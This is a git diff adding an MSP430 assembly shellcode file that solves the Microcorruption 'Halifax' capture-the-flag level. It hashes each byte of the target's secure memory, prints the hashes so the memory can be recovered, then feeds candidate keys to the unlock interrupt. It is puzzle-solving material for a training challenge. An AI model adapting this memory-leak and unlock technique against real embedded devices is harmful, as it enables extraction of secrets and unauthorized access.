diff --git a/sample-asm/shellcode.asm b/sample-asm/shellcode.asm
new file mode 100644
index 0000000..0eac4f5
--- /dev/null
+++ b/sample-asm/shellcode.asm
@@ -0,0 +1,99 @@
+; © 2023-2024 John Breaux
+; Comtains spoilers for Microcorruption Halifax! Be warned!
+; just hash the first 0x140 B and stick them in memory
+
+
+const:
+.define msize  0x1    ; length of each hash in bytes
+.define hsize  0x3    ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)
+.define sr_len 0x140  ; number of bytes in sram to dump
+.define ha_len 0x3c0  ; number of bytes in hash array (hsize * sr_len)
+.define haddr  0x7000 ; address of the big hash array
+.define iaddr  0x8000 ; address of the sram input buffer
+.define kaddr  0x9000 ; address of the key buffer
+external_data:
+.define HEX_LUT 0x4710; "0123456789ABCDEF"
+external_func:
+; INT(int interrupt, ...)
+.define INT             #0x4550
+; getsn(void *dest, size_t len)
+.define getsn           #0x4568
+; putchar(char character)
+.define putchar         #0x4578
+; puts(char *str)
+.define puts            #0x4586
+; memcpy(void *dest, void *src, size_t len)
+.define memcpy          #0x45a4
+; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf)
+.define sha256_internal #0x45b6
+; memset(void* buf, char value, size_t length)
+.define memset          #0x45c8
+
+get_sram_hashes:
+    clr   r11                   ; loop variable in r11
+    mov   #msize, r14           ; r14 = 1
+    mov   #haddr, r13           ; set destination to 0x8000
+    sr_loop:
+        mov   r11, r15          ; mov addr r15
+        call  sha256_internal   ; <sha256_internal>
+        add   #hsize, r13       ; keep 3 bytes of the output
+        inc   r11               ; inc r11
+        cmp   #sr_len, r11      ; do that 0x1000 times
+        jnc   sr_loop
+
+print_hex:
+    clr   r11;
+    ph_loop:
+        mov.b haddr(r11), r14
+        mov.b r14, r15
+        rra   r15               ; using rra here instead of rra.b means the value won't roll into the highest bit
+        rra   r15               ; which negates the need to and 0xf, r15
+        rra   r15
+        rra   r15
+        clrc
+        and   #0xf, r14
+        mov.b HEX_LUT(r15), r15
+        call  putchar           ; <putchar>
+        mov.b HEX_LUT(r14), r15
+        call  putchar           ; <putchar>
+        inc   r11               ; inc r11
+        cmp   #ha_len, r11      ; do that sram_length*3 times
+        jnc   ph_loop
+
+    mov.b #0xa, r15             ; '\n'
+    call  #0x4578               ; putchar ('\n')
+
+
+take_input:
+    mov   #sr_len, r14
+    mov   #iaddr, r15
+    call  getsn                 ; <getsn>
+
+check_all_passwords:
+    ;for i in 0..sr_len:
+    clr   r9
+    pw_loop:
+        ; 	memcpy(kaddr, iaddr + i, len)
+        mov   #0x10, r13
+        mov   #iaddr, r14
+        add   r9, r14
+        mov   #kaddr, r15
+        call  memcpy
+        ; INT (0x42, key)
+        push  #kaddr
+        push  #0x42
+        call  INT
+        add   #4, sp
+        ; INT(7f)
+        unlock7f:
+        push  #0
+        push  #0
+        push  #0x7f
+        call  INT
+        add   #6, sp
+        inc   r9
+        cmp   #sr_len, r9
+        jl    pw_loop
+
+end:
+    ret